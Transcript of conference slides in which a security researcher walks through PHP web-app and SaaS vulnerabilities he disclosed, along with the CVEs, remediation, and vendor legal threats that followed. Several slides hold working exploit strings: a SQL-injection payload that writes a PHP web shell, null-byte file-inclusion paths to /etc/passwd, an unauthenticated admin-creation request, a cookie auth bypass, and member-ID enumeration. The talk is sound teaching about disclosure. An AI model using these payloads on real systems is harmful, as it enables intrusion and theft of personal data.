It's Vulnerable, Now What?: Three Diverse Tales of Woe and Remediation

Transcript

1. It's Vulnerable… Now What?
   Three Diverse Tales of Woe and Remediation
   Mark Stanislav
   

   View Slide

2. De-Facto Quote Slide
   Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
   “Thank goodness the working exploit
   will remain as the ‘gold standard’ for
   cutting through the BS in the field of
   data security for the foreseeable future.”
   - Marsh Ray
   

   View Slide

3. The More Hats The Better
   Day Job: Linux systems administrator
   Night Job: Adjunct lecturer at a university
   Boredom: Finding web app vulnerabilities
   Side Note: PHP programmer for ~10 years*
   * Quickly becoming a Ruby fiend
   

   View Slide

4. PHP Vulnerability Primer
   Inputs That Get Owned:
   $_GET: Query Strings
   index.php?user=mstanislav
   $_POST: Form Submission
   
   $_COOKIE: Cookies
   Chocolate Chip -- nom nom.
   

   View Slide

5. PHP Vulnerability Primer, cont.
   Common Attacks:
   Local File Inclusion (LFI)
   Show me your /etc/passwd file
   SQL Injection
   Show me your user table
   Authentication/Authorization Bypass
   Who needs a username or password?
   

   View Slide

6. Tale #1 - On The Clock
   Scenario: A client hires a PHP
   developer to create a web site for their
   financial service company (Forex)
   Problem: Developer has no business
   writing a ‘Hello, World!’ application, let
   alone a web application handling credit
   card data
   

   View Slide

7. Vulnerabilities Found
   Adjust ‘membership level’ of any account
   Reset account passwords to hardcoded default
   Change any user password to a desired value
   Delete all user accounts
   Retrieve ACH account information
   Retrieve all user account details
   Create an administrative user account
   

   View Slide

8. Clown Shoes
   “Something or someone that is a total joke”
   Source: Urban Dictionary; it’s legit
   

   View Slide

9. Code Review, Part #1
   function updateMembershipLevel() {
   list($level,$email) = GetVars('level','email');
   DB_query("UPDATE users SET membership_level = '$level'
   WHERE email = '$email'");
   }
   Vulnerable Code
   foo.php?mod=user&req=updatelevel&level=100&[email protected]
   Exploit
   Why The Code Sucks
   •No authentication prior to allowing execution of updateMembershipLevel()
   •There is no audit trail to changes being made through this function
   •The code does not escape or sanitize $_GET variables being passed
   

   View Slide

10. Code Review, Part #2
    function updatePassword() {
    list($resetkey,$pass) = PostVars('resetkey','pass1');
    $html = ReadTemplate('password','password_email_form');
    $sql = "UPDATE users SET passwd = md5('".DB_escape_string($pass)."')
    WHERE resetkey='$resetkey'";
    DB_query($sql);
    [...]}
    Vulnerable Code
    
    
    
    
    Exploit
    Why The Code Sucks
    •Only the password input is escaped properly, the ‘resetkey’ $_POST input is not
    •SQL doesn’t use parameterized statements to protect against general SQL injection
    •No audit trail for when passwords are being changed using this function
    

    View Slide

11. Code Review, Part #3
    function insertUser() {
    if ((is_SuperUser()) && (isset($_SESSION['virtual_client_id'])) {
    $clientID = $_SESSION['virtual_client_id'];
    } else {
    $clientID = $_SESSION['client_id'];
    }
    list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip)
    =GetVars('first','last','email','group','passwd','addr1','addr2','city','state','zip');
    [...]}
    Vulnerable Code
    foo.php?mod=adminusers&req=insert&passwd=test&[email protected]&group=1
    Exploit
    Why The Code Sucks
    •insertUser() method isn’t restricted from being available to unauthenticated site visitors
    •is_SuperUser() doesn’t affect arbitrary calls to add a user to the database
    •No sanitization or verification is done to any data based on $_GET variables passed
    •No audit trail for ‘who’ is adding a user; in this case, no one ;)
    

    View Slide

12. Remediation
    Created an executive summary of the
    vulnerabilities, their associated impacts, and
    recommendations to resolve the issues.
    The developer was fired and a new one was
    hired who fixed the issues; which I verified.
    Fun Fact: The developer who wrote this code
    uses the same code-base for 30+ sites currently
    online using the same framework...
    

    View Slide

13. What’s a CVE?
    Common Vulnerabilities & Exposures
    “A CVE Identifier will give you a standardized
    identifier for any given vulnerability or
    exposure.” - MITRE CVE FAQ
    Only for packaged software offerings
    Ideally used in a ‘responsible disclosure’ process
    Keeps issues organized and easy to reference
    Helps to prevent duplication of vulnerabilities
    

    View Slide

14. How Do I Get a CVE?
    1.Find the vulnerability -- score!
    2.Try and verify with the vendor what you’ve
    supposedly found: you could be wrong/late.
    3.Contact a CVE Numbering Authority (CNA)
    4.Ideally the vendor cares and fixes the issue
    5.Release your advisory with the CVE included
    6.Provide links of publication back to MITRE
    

    View Slide

15. Tale #2 - The Community
    Scenario: Random PHP applications you find
    on SourceForge.net & FreshMeat.net
    Problem: Not everyone releasing free (as in
    GNU) or paid (as in $$$) are good
    programmers -- surprise!
    

    View Slide

16. WSN Links SQL Injection
    Vulnerable Code
    search.php?namecondition=IS NULL)) UNION ((SELECT "system($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/
    exec.php&action=filter&filled=1&whichtype=categories
    Exploit
    Why The Code Sucks
    •Improper sanitization of $_GET inputs within some functions of search
    •No explicit installation recommendation to prevent FILE privilege
    •Side Note: foo.php?debug=1 turns on debugging in the default installation
    Didn’t copy it down, but basically:
    ‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injection
    when unified to bridge existing SQL queries to allow for exploitation
    

    View Slide

17. WSN Links Remediation
    CVE-2010-4006
    Vendor blacklisted ‘UNION’ within search
    queries as a ‘fix’ to the issue
    New version released 3 days after notification
    had occurred
    It would be better to actually fix all of the SQL
    injection bugs (yes, there are more) rather than
    using a bandage like a UNION blacklist
    

    View Slide

18. Pointter CMS Authentication Bypass
    Vulnerable Code
    Simply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’t
    impact the exploitation as there is no verification of contents before ‘using’ the
    cookies as a valid authentication mechanism.
    Exploit
    Why The Code Sucks
    •There’s no reason to store a password cookie in the first place
    •A session cookie should be unique and encrypted
    •Blank cookies should never be used as a form of authentication
    On all administrative pages:
    if (!isset($_COOKIE['auser']) or !isset($_COOKIE['apass'])) {
    header("location:index.php");
    }
    

    View Slide

19. Pointter CMS Remediation
    CVE-2010-4332 & CVE-2010-4333
    Two separate products, same vulnerability
    No updates have been released to fix the issue
    Disclosure to vendor was met with legal threats
    and very funny dialog (you’ll see...)
    Vendor claims that the user should rename their
    admin folder to hide, erm... prevent the issue! =)
    

    View Slide

20. The Swiss
    “Not as docile as you’d expect...”
    Source: Me; it’s legit
    

    View Slide

21. E-Mail Outtakes!
    “We do not understand why you try to
    manipulate the softwares. I am sure that you are
    aware that it is illegal to do so.”
    “...it is not your duty to publish anything related
    about our softwares as long as we ask for it.”
    “What you are trying to do, is to find a security
    hole and publish it so that everyone can hack a
    system. This is the illegal part so be aware of
    this.”
    

    View Slide

22. E-Mail Outtakes!, cont.
    “The illegal thing is to publish a security gap to
    show other people the way how to attack. That
    is the same as telling someone how to build a
    bomb.”
    “Of course, it could be made safer and we know
    how to do it. But we have designed the
    softwares so that renaming admin folder gives
    us less work.”
    

    View Slide

23. Null-Byte Attack Primer
    PHP uses C functions for filesystem calls which
    reads a null-byte as ‘end of string’
    include(“/var/www/” . $_GET[‘file’] . “.php”);
    index.php?file=../../../etc/passwd
    include(“/var/www/../../../etc/passwd.php”);
    index.php?file=../../../etc/passwd%00
    include(“/var/www/../../../etc/passwd”);
    

    View Slide

24. Pulse CMS Local File Inclusion
    Vulnerable Code
    index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
    Exploit
    Why The Code Sucks
    •This method to prevent LFI is easily defeated with magic_quotes_gpc disabled
    •There’s no sanitization or regex used to prevent LFI attacks
    •Null-byte attacks are a problem with PHP (C-based) and need to be considered
    $page = $_REQUEST['p'];
    switch ($page) {
    case $page:
    include("includes/". $page .".php");
    break;
    }
    

    View Slide

25. Pulse CMS Remediation
    CVE-2010-4330
    Vendor patched the current version immediately
    and then released a few version a few days later
    Null-byte attacks are a real problem and
    programmers need to program with it in mind
    File inclusion from a user-controlled variable
    should heavily interrogated (regex/sanitization)
    

    View Slide

26. Tale #3 - SaaS Gone Wrong
    Scenario: You sign-up for a gym membership
    Problem: Your gym’s online fitness integration
    web site has broken Single Sign-On causing
    massive PII/PHI leakage
    

    View Slide

27. SSO “Bypass”
    Vulnerable Code
    http://www.example.com/diff/partners/member_activate.aspx?
    memberid=[memberid_integer]&gymid=[gymid_integer]
    Exploit
    Why The Code Sucks
    •It didn’t require users to ‘sign-up’ for some of their data to be available
    •Complete SSO implementation failure
    •No one could have possibly tested/QA’ed this code before it was launched
    Have no access to company’s site code, but here’s my best guess...
    checkAuthentication($memberid, $gymid) {
    //Implement this later, kthx!
    }
    

    View Slide

28. Vulnerability Verification
    Script #1: Out of 10,000 sequential 'memberid'
    values roughly 2,700 accounts existed in either an
    'activated' or 'unactivated' state.
    Script #2: Of the 1,000 'memberid' values
    checked, 76 accounts were activated. One user
    profile had a picture, eight users had listed phone
    numbers, and at least one user had a medical
    questionnaire filled-out.
    

    View Slide

29. Information Being Disclosed
    Unactivated Account: First Name, Last Name,
    Date of Birth, Gender, and E-Mail Address
    Activated Account: Photo, First Name, Last
    Name, Date of Birth, Gender, E-Mail Address,
    Phone Number, Height, Weight, Body Fat %,
    Timezone, Gym Membership Company,
    Workout Schedule, and Medical History (blood
    pressure issues, heart problems, recent surgery,
    pregnancy, diabetes, etc.)
    

    View Slide

30. Remediation
    Contacted CEO (small company) with a report
    Lots of follow-up e-mails with increasing
    amounts of people (read: lawyers/execs) added
    Consistently reaffirmed my commitment to help
    and deflected any comments towards me being
    some kind of nefarious hacker
    Took three weeks after successful contact to
    have the issue actually fixed...
    

    View Slide

31. Customers Notified
    90,000+
    

    View Slide

32. But be careful...
    It’s a very thin line between committing a crime
    and just trying to help a web site with a problem
    Don’t make threats, don’t ‘force their hand’; be
    respectful, professional, and continuously affirm
    your desire to protect people and information
    Anyone can be sued at anytime for anything in
    our country -- it doesn’t mean you’re guilty, but
    you can certainly lose time and money this way
    Let your ethics and common sense lead you...
    

    View Slide

33. Generalized Take-Aways
    Do the right thing, consistently, and people
    won’t have much room to actually threaten you
    Full-disclosure to the community helps to keep
    developers and businesses accountable for the
    products and services they offer
    Responsible disclosure allows you to make more
    friends than enemies; most people are really
    appreciative of your assistance
    Vulnerability research is tediously fun! ;)
    

    View Slide

34. My Thoughts...
    Info Sec. is everyone’s responsibility
    Don’t accept an answer of “well, we didn’t build
    this with security in mind...”
    Ethics and information security are not, in my
    mind, allowed to be separated
    This isn’t about 1337 ‘sploits. It’s about
    protecting your business, your friends, your
    family, and yourself from unethical people
    

    View Slide

35. Thanks...
    Jon Oberheide - Duo Security
    Steve Christy - MITRE
    Todd Jarvis - Packet Storm Security
    

    View Slide

36. Contact
    E-Mail: [email protected]
    Twitter: @markstanislav
    Website: http://www.uncompiled.com
    

    View Slide